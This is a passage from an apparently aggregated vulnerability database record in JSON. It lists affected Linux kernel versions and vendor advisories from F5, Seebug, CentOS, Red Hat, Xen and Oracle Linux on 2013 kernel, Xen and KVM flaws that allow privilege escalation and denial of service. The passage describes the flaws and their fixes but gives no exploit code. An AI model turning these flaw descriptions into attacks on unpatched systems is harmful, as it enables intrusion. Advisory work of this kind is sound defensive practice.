"cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:23:01", "bulletinFamily": "software", "cvelist": ["CVE-2013-0311"], "edition": 1, "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. \n \nF5 is responding to this vulnerability as determined by the parameters defined in SOL4602: Overview of the F5 security vulnerability response policy. \n \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-05-27T00:00:00", "published": "2014-10-23T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15732.html", "id": "SOL15732", "title": "SOL15732 - Linux kernel vulnerability CVE-2013-0311", "type": "f5", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:46:12", "description": "BUGTRAQ ID: 57940\r\nCVE(CAN) ID: CVE-2013-0228\r\n\r\nLinux Kernel\u662fLinux\u64cd\u4f5c\u7cfb\u7edf\u7684\u5185\u6838\u3002\r\n\r\nLinux kernel\u5185arch/x86/xen/xen-asm_32.S\u7684xen_iret\u51fd\u6570\u6ca1\u6709\u6b63\u786e\u5904\u7406DS\u6bb5\u5bc4\u5b58\u5668\u5185\u7684\u65e0\u6548\u503c\uff0c32-bit PV Xen domain\u4e2d\u7684guest\u7528\u6237\u53ef\u901a\u8fc7\u7279\u5236\u7684\u5e94\u7528\u5229\u7528\u6b64\u6f0f\u6d1e\u81f4\u4f7fguest\u5d29\u6e83\u751a\u800c\u63d0\u5347\u5176\u6743\u9650\u3002\r\n0\r\nLinux kernel 2.6.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.kernel.org/", "published": "2013-03-10T00:00:00", "title": "Linux Kernel \u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e(CVE-2013-0228)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0228"], "modified": "2013-03-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60670", "id": "SSV:60670", "sourceData": "", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "centos": [{"lastseen": "2019-12-20T18:25:49", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0228", "CVE-2013-0268"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0630\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way the xen_iret() function in the Linux kernel\nused the DS (the CPU's Data Segment) register. A local, unprivileged user\nin a 32-bit, para-virtualized Xen hypervisor guest could use this flaw to\ncrash the guest or, potentially, escalate their privileges. (CVE-2013-0228,\nImportant)\n\n* A flaw was found in the way file permission checks for the\n\"/dev/cpu/[x]/msr\" files were performed in restricted root environments\n(for example, when using a capability-based security model). A local user\nwith the ability to write to these files could use this flaw to escalate\ntheir privileges to kernel level, for example, by writing to the\nSYSENTER_EIP_MSR register. (CVE-2013-0268, Important)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031684.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0630.html", "edition": 3, "modified": "2013-03-13T11:49:36", "published": "2013-03-13T11:49:36", "href": "http://lists.centos.org/pipermail/centos-announce/2013-March/031684.html", "id": "CESA-2013:0630", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:13", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0228", "CVE-2013-0268"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way the xen_iret() function in the Linux kernel\nused the DS (the CPU's Data Segment) register. A local, unprivileged user\nin a 32-bit, para-virtualized Xen hypervisor guest could use this flaw to\ncrash the guest or, potentially, escalate their privileges. (CVE-2013-0228,\nImportant)\n\n* A flaw was found in the way file permission checks for the\n\"/dev/cpu/[x]/msr\" files were performed in restricted root environments\n(for example, when using a capability-based security model). A local user\nwith the ability to write to these files could use this flaw to escalate\ntheir privileges to kernel level, for example, by writing to the\nSYSENTER_EIP_MSR register. (CVE-2013-0268, Important)\n\nThe CVE-2013-0228 issue was discovered by Andrew Jones of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n", "modified": "2018-06-06T20:24:13", "published": "2013-03-12T04:00:00", "id": "RHSA-2013:0630", "href": "https://access.redhat.com/errata/RHSA-2013:0630", "type": "redhat", "title": "(RHSA-2013:0630) Important: kernel security and bug fix update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:07", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4542", "CVE-2013-0311", "CVE-2013-1767", "CVE-2013-1773", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-1848"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way the vhost kernel module handled descriptors\nthat spanned multiple regions. A privileged guest user in a KVM\n(Kernel-based Virtual Machine) guest could use this flaw to crash the host\nor, potentially, escalate their privileges on the host. (CVE-2013-0311,\nImportant)\n\n* A buffer overflow flaw was found in the way UTF-8 characters were\nconverted to UTF-16 in the utf8s_to_utf16s() function of the Linux kernel's\nFAT file system implementation. A local user able to mount a FAT file\nsystem with the \"utf8=1\" option could use this flaw to crash the system or,\npotentially, to escalate their privileges. (CVE-2013-1773, Important)\n\n* A flaw was found in the way KVM handled guest time updates when the\nbuffer the guest registered by writing to the MSR_KVM_SYSTEM_TIME machine\nstate register (MSR) crossed a page boundary. A privileged guest user could\nuse this flaw to crash the host or, potentially, escalate their privileges,\nallowing them to execute arbitrary code at the host kernel level.\n(CVE-2013-1796, Important)\n\n* A potential use-after-free flaw was found in the way KVM handled guest\ntime updates when the GPA (guest physical address) the guest registered by\nwriting to the MSR_KVM_SYSTEM_TIME machine state register (MSR) fell into a\nmovable or removable memory region of the hosting user-space process (by\ndefault, QEMU-KVM) on the host. If that memory region is deregistered from\nKVM using KVM_SET_USER_MEMORY_REGION and the allocated virtual memory\nreused, a privileged guest user could potentially use this flaw to escalate\ntheir privileges on the host. (CVE-2013-1797, Important)\n\n* A flaw was found in the way KVM emulated IOAPIC (I/O Advanced\nProgrammable Interrupt Controller). A missing validation check in the\nioapic_read_indirect() function could allow a privileged guest user to\ncrash the host, or read a substantial portion of host kernel memory.\n(CVE-2013-1798, Important)\n\n* It was found that the default SCSI command filter does not accommodate\ncommands that overlap across device classes. A privileged guest user could\npotentially use this flaw to write arbitrary data to a LUN that is\npassed-through as read-only. (CVE-2012-4542, Moderate)\n\n* A use-after-free flaw was found in the tmpfs implementation. A local user\nable to mount and unmount a tmpfs file system could use this flaw to cause\na denial of service or, potentially, escalate their privileges.\n(CVE-2013-1767, Low)\n\n* A format string flaw was found in the ext3_msg() function in the Linux\nkernel's ext3 file system implementation. A local user who is able to mount\nan ext3 file system could use this flaw to cause a denial of service or,\npotentially, escalate their privileges. (CVE-2013-1848, Low)\n\nRed Hat would like to thank Andrew Honig of Google for reporting the\nCVE-2013-1796, CVE-2013-1797, and CVE-2013-1798 issues. The CVE-2012-4542\nissue was discovered by Paolo Bonzini of Red Hat.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2015-04-24T14:19:56", "published": "2013-06-11T04:00:00", "id": "RHSA-2013:0928", "href": "https://access.redhat.com/errata/RHSA-2013:0928", "type": "redhat", "title": "(RHSA-2013:0928) Important: kernel security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:A/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:27", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0268", "CVE-2013-0871"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way file permission checks for the\n\"/dev/cpu/[x]/msr\" files were performed in restricted root environments \n(for example, when using a capability-based security model). A local user \nwith the ability to write to these files could use this flaw to escalate \ntheir privileges to kernel level, for example, by writing to the \nSYSENTER_EIP_MSR register. (CVE-2013-0268, Important)\n\n* A race condition was found in the way the Linux kernel's ptrace\nimplementation handled PTRACE_SETREGS requests when the debuggee was woken\ndue to a SIGKILL signal instead of being stopped. A local, unprivileged\nuser could use this flaw to escalate their privileges. (CVE-2013-0871,\nImportant)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T11:54:45", "published": "2013-03-11T04:00:00", "id": "RHSA-2013:0621", "href": "https://access.redhat.com/errata/RHSA-2013:0621", "type": "redhat", "title": "(RHSA-2013:0621) Important: kernel security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "xen": [{"lastseen": "2016-04-01T21:57:13", "bulletinFamily": "software", "cvelist": ["CVE-2013-0217", "CVE-2013-0216"], "description": "#### ISSUE DESCRIPTION\nThe Xen netback implementation contains a couple of flaws which can allow a guest to cause a DoS in the backend domain, potentially affecting other domains in the system.\nCVE-2013-0216 is a failure to sanity check the ring producer/consumer pointers which can allow a guest to cause netback to loop for an extended period preventing other work from occurring.\nCVE-2013-0217 is a memory leak on an error path which is guest triggerable.\n#### IMPACT\nA malicious guest can mount a DoS affecting the entire system.\n#### VULNERABLE SYSTEMS\nAll systems running guests with access to PV network devices are vulnerable.\nCVE-2013-0216 affects both mainline ("pvops") and classic-Xen patch kernels.\nCVE-2013-0217 affects only mainline ("pvops") kernels.\n", "edition": 1, "modified": "2013-02-05T12:59:00", "published": "2013-02-05T12:00:00", "id": "XSA-39", "href": "http://xenbits.xen.org/xsa/advisory-39.html", "type": "xen", "title": "Linux netback DoS via malicious guest ring.", "cvss": {"score": 5.2, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-04-01T21:57:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-0228"], "description": "#### ISSUE DESCRIPTION\nLinux kernel when returning from an iret assumes that %ds segment is safe and uses it to reference various per-cpu related fields. Unfortunately the user can modify the LDT and provide a NULL one. Whenever an iret is called we end up in xen_iret and try to use the %ds segment and cause an general protection fault.\n#### IMPACT\nMalicious or buggy unprivileged user space can cause the guest kernel to crash, or permit a privilege escalation within the guest, or operate erroneously.\n#### VULNERABLE SYSTEMS\nAll 32bit PVOPS versions of Linux are affected, since the introduction of Xen PVOPS support in 2.6.23. Classic-Xen kernels are not vulnerable.\n", "edition": 1, "modified": "2013-02-13T16:49:00", "published": "2013-02-12T12:00:00", "id": "XSA-42", "href": "http://xenbits.xen.org/xsa/advisory-42.html", "type": "xen", "title": "Linux kernel hits general protection if %ds is corrupt for 32-bit PVOPS.", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0871", "CVE-2013-0228", "CVE-2013-0268"], "description": "[2.6.32-358.2.1]\n- [kernel] utrace: ensure arch_ptrace/ptrace_request can never race with SIGKILL (Oleg Nesterov) [912073 912074] {CVE-2013-0871}\n[2.6.32-358.1.1]\n- [netdrv] mlx4: Set number of msix vectors under SRIOV mode to firmware defaults (Michal Schmidt) [911663 904726]\n- [netdrv] mlx4: Fix bridged vSwitch configuration for non SRIOV mode (Michal Schmidt) [910998 903644]\n- [net] rtnetlink: Fix IFLA_EXT_MASK definition (regression) (Thomas Graf) [909815 903220]\n- [x86] msr: Add capabilities check (Nikola Pajkovsky) [908698 908699] {CVE-2013-0268}\n- [x86] msr: Remove incorrect, duplicated code in the MSR driver (Nikola Pajkovsky) [908698 908699] {CVE-2013-0268}\n- [virt] xen: dont assume ds is usable in xen_iret for 32-bit PVOPS (Andrew Jones) [906310 906311] {CVE-2013-0228}\n- [kernel] cputime: Avoid multiplication overflow on utime scaling (Stanislaw Gruszka) [908794 862758]\n- [net] sunrpc: When changing the queue priority, ensure that we change the owner (Steve Dickson) [910370 902965]\n- [net] sunrpc: Ensure we release the socket write lock if the rpc_task exits early (Steve Dickson) [910370 902965]\n- [fs] nfs: Ensure that we free the rpc_task after read and write cleanups are done (Steve Dickson) [910370 902965]\n- [net] sunrpc: Ensure that we free the rpc_task after cleanups are done (Steve Dickson) [910370 902965]\n- [net] sunrpc: Dont allow low priority tasks to pre-empt higher priority ones (Steve Dickson) [910370 902965]\n- [fs] nfs: Add sequence_priviliged_ops for nfs4_proc_sequence() (Steve Dickson) [910370 902965]\n- [fs] nfs: The NFSv4.0 client must send RENEW calls if it holds a delegation (Steve Dickson) [910370 902965]\n- [fs] nfs: nfs4_proc_renew should be declared static (Steve Dickson) [910370 902965]\n- [fs] nfs: nfs4_locku_done must release the sequence id (Steve Dickson) [910370 902965]\n- [fs] nfs: We must release the sequence id when we fail to get a session slot (Steve Dickson) [910370 902965]\n- [fs] nfs: Add debugging messages to NFSv4s CLOSE procedure (Steve Dickson) [910370 902965]\n- [net] sunrpc: Clear the connect flag when socket state is TCP_CLOSE_WAIT (Steve Dickson) [910370 902965]\n- [fs] nfs: cleanup DS stateid error handling (Steve Dickson) [910370 902965]\n- [fs] nfs: handle DS stateid errors (Steve Dickson) [910370 902965]\n- [fs] nfs: Fix potential races in xprt_lock_write_next() (Steve Dickson) [910370 902965]\n- [fs] nfs: Ensure correct locking when accessing the 'lock_states' list (Steve Dickson) [910370 902965]\n- [fs] nfs: Fix the handling of NFS4ERR_SEQ_MISORDERED errors (Steve Dickson) [910370 902965]\n- [netdrv] be2net: fix unconditionally returning IRQ_HANDLED in INTx (Ivan Vecera) [910373 909464]\n- [netdrv] be2net: fix INTx ISR for interrupt behaviour on BE2 (Ivan Vecera) [910373 909464]\n- [netdrv] be2net: fix a possible events_get() race on BE2 (Ivan Vecera) [910373 909464]\n- [fs] gfs2: Get a block reservation before resizing a file (Robert S Peterson) [908398 875753]\n- [net] ipv6: do not create neighbor entries for local delivery (Jiri Pirko) [909159 896020]\n- [net] bonding: check for assigned mac before adopting the slaves mac address (Veaceslav Falico) [908737 905126]\n- [fs] nfs: nfs4_xdr_enc_layout{commit, return} must return status (Steve Dickson) [908733 907227]\n- [fs] set s_type before destroy_super in sget() (Eric Sandeen) [909813 904982]\n- [scsi] ses: Avoid kernel panic when lun 0 is not mapped (Ewan Milne) [908739 886867]\n- [block] avoid divide-by-zero with zero discard granularity (Mike Snitzer) [911000 901705]\n- [block] discard granularity might not be power of 2 (Mike Snitzer) [911000 901705]\n- [netdrv] tg3: Fix crc errors on jumbo frame receive (Ivan Vecera) [909816 895336]\n- [netdrv] igb: set E1000_IMS_TS interrupt bit in igb_irq_enable (Stefan Assmann) [909818 871795]\n- [pci] intel-iommu: Prevent devices with RMRRs from being placed into SI Domain (Tony Camuso) [908744 678451]\n- [scsi] sd: Reshuffle init_sd to avoid crash (Ewan Milne) [911655 888417]\n- [mm] add numa node symlink for cpu devices in sysfs (Neil Horman) [909814 878708]", "edition": 4, "modified": "2013-03-12T00:00:00", "published": "2013-03-12T00:00:00", "id": "ELSA-2013-0630", "href": "http://linux.oracle.com/errata/ELSA-2013-0630.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:45", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0871", "CVE-2013-0268", "CVE-2013-1773", "CVE-2013-0913"], "description": "[2.6.39-400.21.1]\n- SPEC: v2.6.39-400.21.1 (Maxim Uvarov)\n- xen/mmu: On early bootup, flush the TLB when changing RO->RW bits Xen provided pagetables. (Konrad Rzeszutek Wilk)\n[2.6.39-400.20.1]\n- SPEC: v2.6.39-400.20.1 (Maxim Uvarov)\n- PCI: Set device power state to PCI_D0 for device without native PM support (Ajaykumar Hotchandani) [Orabug: 16482495]\n- sched: Fix cgroup movement of waking process (Daisuke Nishimura) [Orabug: 13740515]\n- sched: Fix cgroup movement of newly created process (Daisuke Nishimura) [Orabug: 13740515]\n- sched: Fix cgroup movement of forking process (Daisuke Nishimura) [Orabug: 